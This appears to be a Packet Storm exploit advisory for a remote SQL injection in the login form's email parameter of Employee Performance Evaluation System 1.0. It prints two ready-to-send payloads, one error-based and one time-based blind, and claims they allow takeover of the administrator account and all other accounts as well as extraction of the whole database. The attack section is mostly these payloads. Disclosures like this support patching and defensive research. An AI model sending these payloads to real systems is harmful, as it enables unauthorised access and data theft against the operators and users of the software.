what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Employee Performance Evaluation System 1.0 SQL Injection

Employee Performance Evaluation System 1.0 SQL Injection
Posted Mar 11, 2022
Authored by nu11secur1ty

Employee Performance Evaluation System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | f7b438c59cdf62c826a41ead1dff1e32c93751fb715085ea9d7619e18742ac40

Employee Performance Evaluation System 1.0 SQL Injection

Change Mirror Download
## Title: Employee Performance Evaluation v1.0 SQLi
## Author: nu11secur1ty
## Date: 03.11.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Employee-Performance-Evaluation

## Description:
The `email` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the email parameter, and a database
error message was returned.
Two single quotes were then submitted and the error message
disappeared. You should review the contents of the error message, and
the application's handling of other input, to confirm whether a
vulnerability is present.
The attacker can take administrator account control and also of all
accounts on this system, also the malicious user can download all
information about this system.

Status: CRITICAL

[+] Payloads:

```mysql

---
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: email=YgGZcTAx@sourcecodester.com' AND (SELECT 6536
FROM(SELECT COUNT(*),CONCAT(0x71786a7071,(SELECT
(ELT(6536=6536,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
iQpA&password=hacked&login=0

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=YgGZcTAx@sourcecodester.com' AND (SELECT 2365 FROM
(SELECT(SLEEP(5)))lFkz)-- xqup&password=hacked&login=0
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Employee-Performance-Evaluation)

## Proof and Exploit:
[href](https://streamable.com/9q1tni)


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close